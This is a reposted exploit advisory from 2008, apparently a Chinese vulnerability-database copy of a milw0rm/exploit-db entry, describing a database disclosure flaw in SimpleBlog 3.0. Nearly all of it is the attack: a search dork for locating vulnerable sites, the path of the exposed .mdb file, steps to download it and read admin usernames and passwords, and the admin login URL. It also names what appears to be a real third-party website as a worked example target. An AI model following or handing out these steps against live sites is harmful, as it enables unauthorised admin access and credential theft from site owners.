SimpleBlog 3.0 - Database Disclosure

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056983 漏洞类型
发布时间 2008-11-25 更新时间 2008-11-25
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7232
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
[»] SimpleBlog 3.0 Mdb Vulnerability
[»]
[»] ----------------------------------------------------------
[»] Author : EL_MuHaMMeD
[»]
[»] Date : 26.11.2008
[»]
[»] Contact : cwelmuhammed@gmail.com
[»]
[»] -----------------------------------------------------------


Script : SimpleBlog 3.0

Download : http://www.8pixel.net/FetchFile.aspx?doc=simpleblog3.rar

Dork : "inurl:simpleblog3"

Our mdb path : db/simpleBlog.mdb

Exploits :

Step 1 - http://www.[target].com/[path]/simpleblog3/db/simpleBlog.mdb

Step 2 - Download that mdb file and read admin name & pass from "users" table.

Step 3 - http://www.[target].com/[path]/simpleblog3/admin/default.asp

Example :

http://www.bvrg.org.uk/simpleblog3/db/simpleBlog.mdb

http://www.bvrg.org.uk/simpleblog3/admin/default.asp

 

[»] ----------------------------------------------------------------------
[»]
[»] Cyber-Security.ORG - ELMuHaMMeD.COM
[»]
[»] ----------------------------------------------------------------------

# milw0rm.com [2008-11-25]